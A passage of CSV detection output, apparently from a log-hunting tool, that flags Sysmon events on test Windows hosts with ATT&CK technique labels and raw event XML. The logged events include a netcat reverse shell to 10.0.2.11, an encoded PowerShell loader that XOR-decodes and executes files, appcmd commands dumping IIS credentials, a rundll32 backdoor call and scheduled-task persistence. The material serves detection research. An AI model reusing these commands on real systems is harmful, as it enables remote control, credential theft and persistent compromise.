BQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 141993 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-11 23:21:56.654 + 747F3D96-DE14-5EB9-0000-001079154300 + 224 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + c:\Users\IEUser\tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-5461-5EBA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DE14-5EB9-0000-00107C0F4300 + 4468 + C:\Users\IEUser\Tools\Misc\nc64.exe + c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5961 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.433 + 365ABB72-3D6F-5CEB-0000-00100FC7FF00 + 2168 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112972 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-10 00:09:43.370 + 747F3D96-4647-5EB7-0000-0010B3454B01 + 7672 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + c:\Users\IEUser\Tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-3B92-5EB5-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-4640-5EB7-0000-0010EF364B01 + 372 + C:\Windows\System32\cmd.exe + c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5958 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.353 + 365ABB72-3D6F-5CEB-0000-00104FC3FF00 + 2484 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5951 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 10:16:50.403 + 747F3D96-B092-5D46-0000-001089041204 + 7792 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-B091-5D46-0000-001081F71104 + 820 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424076 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.394 + 747F3D96-51D0-5F93-0000-0010B2B35B00 + 5572 + C:\Windows\SysWOW64\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 339223 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-26 22:13:19.375 + 747F3D96-FF9D-5F1D-0000-00100AC62400 + 7400 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 127.0.0.1 + MSEDGEWIN10 + 49796 + + false + 127.0.0.1 + MSEDGEWIN10 + 445 + microsoft-ds + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5955 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.283 + 365ABB72-3D6F-5CEB-0000-00108FBFFF00 + 168 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + 